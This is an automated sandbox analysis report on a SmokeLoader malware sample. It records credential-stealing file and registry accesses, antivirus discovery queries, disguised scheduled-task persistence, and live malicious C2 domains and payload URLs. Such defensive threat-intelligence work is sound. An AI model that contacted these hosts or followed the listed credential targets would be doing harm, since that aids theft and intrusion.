Source: FDDB.exe, 00000008.00000003.3479732751.0000021DDD8ED000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3324616797.0000021DDD8E2000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3325925801.0000021DDD91C000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000002.4489409357.0000021DDD8EF000.00000004.00000020.00020000.00000000.sdmp, FDDB.exe, 00000008.00000003.3326174771.0000021DDD8E8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiSpywareProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM FirewallProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiSpywareProduct

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
Source: Yara match	File source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000010.00000002.4486772603.00000000008C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.4486975277.0000000000191000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 4444, type: MEMORYSTR
Source: Yara match	File source: 6.2.3E40.exe.560e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dghchav.5e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.dghchav.5f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.3E40.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.3E40.exe.600000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.dghchav.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000003.2684210393.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114850031.0000000002370000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2735276469.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2931576265.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2982873164.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2983352319.00000000020E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2340094122.00000000020B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2114892541.0000000002391000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2340140325.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2735334108.0000000000621000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	241 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	12 Native API	Boot or Logon Initialization Scripts	523 Process Injection	1 Deobfuscate/Decode Files or Information	11 Input Capture	4 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	1 Credentials in Registry	2510 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Command and Scripting Interpreter	Login Hook	Login Hook	1 Software Packing	NTDS	881 Security Software Discovery	Distributed Component Object Model	11 Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	35 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	4 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	35 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	523 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 Hidden Files and Directories	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
9VgIkx4su0.exe	34%	ReversingLabs
9VgIkx4su0.exe	100%	Avira	HEUR/AGEN.1310247
9VgIkx4su0.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\dghchav	100%	Avira	HEUR/AGEN.1310247
C:\Users\user\AppData\Local\Temp\3E40.exe	100%	Avira	HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\eihchav	100%	Avira	HEUR/AGEN.1310247
C:\Users\user\AppData\Roaming\dghchav	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\FDDB.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\3E40.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\eihchav	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\FDDB.exe	55%	ReversingLabs	Win64.Trojan.Generic
C:\Users\user\AppData\Roaming\eihchav	34%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
calvinandhalls.com	23.145.40.162	true	true	unknown
bg.microsoft.map.fastly.net	199.232.210.172	true	false	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
nwgrus.ru	190.224.203.37	true	true	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Reputation
https://23.145.40.164/ksa9104.exe	true	unknown
http://unicea.ws/tmp/index.php	true	unknown
http://nwgrus.ru/tmp/index.php	true	unknown
https://calvinandhalls.com/search.php	true	unknown
http://tech-servers.in.net/tmp/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://calvinandhalls.com/	explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3153296640.0000000003059000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/earch.php	explorer.exe, 0000000A.00000002.3153296640.000000000302B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://word.office.comon	explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.2098614034.000000000C8D3000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false	URL Reputation: safe	unknown
https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0	explorer.exe, 0000000A.00000002.3153296640.0000000003042000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/ac/?q=	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false		unknown
https://calvinandhalls.com/search.phpMozilla/5.0	explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3103492810.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.4488375933.0000000000657000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.4487737698.0000000000939000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.4487808620.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.4487806601.0000000001419000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000002.00000000.2097959116.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2094847936.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094289006.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2094815551.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false	URL Reputation: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000000.2095504231.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false	URL Reputation: safe	unknown
https://calvinandhalls.com/search.php8	explorer.exe, 0000000A.00000002.3153296640.0000000003000000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://calvinandhalls.com/;	explorer.exe, 0000000A.00000002.3153296640.0000000002FD7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2093454201.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000000.2097959116.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/	explorer.exe, 00000002.00000000.2095504231.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.v	explorer.exe, 00000002.00000000.2091336304.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	explorer.exe, 0000000A.00000003.3127681081.000000000303F000.00000004.00000020.00020000.00000000.sdmp, AB18.tmp.10.dr	false	URL Reputation: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000002.00000000.2095504231.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
187.131.253.169	unknown	Mexico	8151	UninetSAdeCVMX	true
190.224.203.37	nwgrus.ru	Argentina	7303	TelecomArgentinaSAAR	true
23.145.40.164	unknown	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
23.145.40.162	calvinandhalls.com	Reserved	22631	SURFAIRWIRELESS-IN-01US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525244
Start date and time:	2024-10-03 23:26:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9VgIkx4su0.exe renamed because original name is a hash value
Original Sample Name:	5d99d66ef42ec43af05b9304aebefdb6.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@63/15@7/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 143 Number of non-executed functions: 132
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 20.190.159.68, 20.190.159.0, 40.126.31.67, 40.126.31.71, 20.190.159.64, 20.190.159.75, 40.126.31.73, 20.190.159.4
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.afd.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: 9VgIkx4su0.exe

Simulations

Behavior and APIs

Time	Type	Description
17:27:16	API Interceptor	324207x Sleep call for process: explorer.exe modified
17:28:44	API Interceptor	14x Sleep call for process: WMIC.exe modified
23:27:22	Task Scheduler	Run new task: Firefox Default Browser Agent 210CAF631C6B44AB path: C:\Users\user\AppData\Roaming\eihchav
23:28:25	Task Scheduler	Run new task: Firefox Default Browser Agent 969FBE99DA30A371 path: C:\Users\user\AppData\Roaming\dghchav

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
187.131.253.169	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
187.131.253.169	k8JAXb3Lhs.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
190.224.203.37	3441TYcdND.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	gebeus.ru/tmp/index.php
	XQpBmNRd7j.exe	Get hash	malicious	Djvu	Browse	cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200
	file.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	sajdfue.com/files/1/build3.exe
	IzXkxsTrEt.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	sajdfue.com/files/1/build3.exe
	dmDeFvntUL.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, SmokeLoader	Browse	sajdfue.com/files/1/build3.exe
	CgoegMEw8J.exe	Get hash	malicious	LummaC, Babuk, Djvu, Glupteba, LummaC Stealer, PureLog Stealer, SmokeLoader	Browse	sdfjhuz.com/dl/build2.exe
	7vMi37TpMO.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, Stealc	Browse	trmpc.com/check/index.php
	ENEDGCErLu.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, SystemBC	Browse	trmpc.com/check/index.php
	F7uYlkAOh8.exe	Get hash	malicious	LummaC, Glupteba, Raccoon Stealer v2, SmokeLoader, Stealc	Browse	emgvod.com/emd/1.jpg
23.145.40.164	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse
	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	file.exe	Get hash	malicious	SmokeLoader	Browse
	KTh1gQlT9a.exe	Get hash	malicious	SmokeLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	58.151.148.90
	v173TV3V11.exe	Get hash	malicious	SmokeLoader	Browse	190.219.117.240
	0k3ibTiMjy.exe	Get hash	malicious	SmokeLoader	Browse	189.61.54.32
	qg5Ddf4an9.exe	Get hash	malicious	SmokeLoader	Browse	181.52.122.51
	aZPm0tHPTX.exe	Get hash	malicious	SmokeLoader	Browse	187.131.253.169
	file.exe	Get hash	malicious	SmokeLoader	Browse	196.189.156.245
	k8JAXb3Lhs.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	OCYe9qcxiM.exe	Get hash	malicious	SmokeLoader	Browse	187.228.112.175
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.249.193.233
	file.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
s-part-0017.t-0009.t-msedge.net	https://account.attributes.best/communication.aspx?now=yikes.bikes@saic.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.google.se/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s/link.mail.beehiiv.com/ss/c/u001.mtSAz3_WgZe6oQdiJX3I5Wky17Shk-m8xsMoltULMS3mzuBnL-QM9pVTUTxyWc1WyOovmb3Tk3NbIL2d2EAiLnALFxIwpw4Ea5BJnfNlGtrBBU_09OdOyxWIoH5OGk5krozZGyDG04GwV1A1i62V7ZHAsHD2HuXxLRbuTLwJ7nne5OoBikrWbP09wdmrU0Ux1PwQTxWW-4WqOLqDM-eOzn5OS5dc9AC-zsZGTpLU68lyIxLrcGUjprs01qDo_AF9kArbtDnZS59rgsqwPhVy55PUqH74R1QD9RQNSwa0QLjmNb6xFyDx4TkQQ9pmK-Sq/4a7/BVRt3igITgKfI8bq35Ml_w/h53/h001.yn5JRYzfVDjfbL0RFC-jVPp1XHK_GYk_K4Zr7dwWM3M	Get hash	malicious	Unknown	Browse	13.107.246.45
	ORA _ Morningstar DBRS.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.ccjm.org/highwire_log/share/mendeley?link=https://onpro.info	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://auth-owlting.com/enterprise/core.js	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.salarytoolint.net/lam/c650d2e0-ca12-4bbd-8ff2-35011d35d0af/a717ea91-20df-42de-8c6b-2dc111827916/c05902dd-1112-4a4c-81f2-0bf48471902f/login?id=eHFCV2l4bzZWNDNkSEk1T2EvVTd3dkoyNlIxaUJuY3g1TWRhbmM2MlF4S01yN2FZOXVoV2F1TUloUFJzQWwvREl6cFB2SEpPbHdRUENta1E2UXM3MW10MllxU1N6eGZmUktOdWgwMG5IcnVNRlhpTkpMb1pzczZIK1NBaGdHd1J5V1BjeW4zbXU4enczMDRvekpNUHlEZEJxVkNqVjVZNU5HWnNVeEpKTjgvblZBMUVQbHUxL1FLcVhCcHV6RUtQeDluUFFqQXlNRWJKSjZRZGRtQ1VwbEpHQkE1VU1EZ2hxMnQzSWdMWGthWFhqZTVOVy9wUlRyaXJoMzd6eGV6N2p1YUMrVGxORzdwQTNZeExtbGNvUFZ4bU1zU2lUcnJhRDdMMVFLaWtDWUZoeVpvdWphTVFwa1ZobTkzVEdWSisvSEVxQk82blo5TEhSdmowcDhra2dJNzFZcW5ra1FtRlY4azV5MkVrQjdVaGtPZFpCNWdrN214dEZBV21BTlZEY3FteVVCTGNzYVBTZDNhNXVIeEl1VTdXZ2tpL2RiOVhWeEZPWHhsLzNia0h0NVpCdVI4TVYvVzZiUHpKZnp4VQ	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://wvr4dgzxxavl6jjpq7rl.igortsaplin.pro/WFzFCiNx	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://www.calameo.com/read/0077804248b46bb5a7c19	Get hash	malicious	HtmlDropper	Browse	13.107.246.45
	https://secured.viewonlineportalshared.com/	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.107.246.45
	http://reviewnewdocuments.wordpress.com/	Get hash	malicious	Unknown	Browse	13.107.246.45
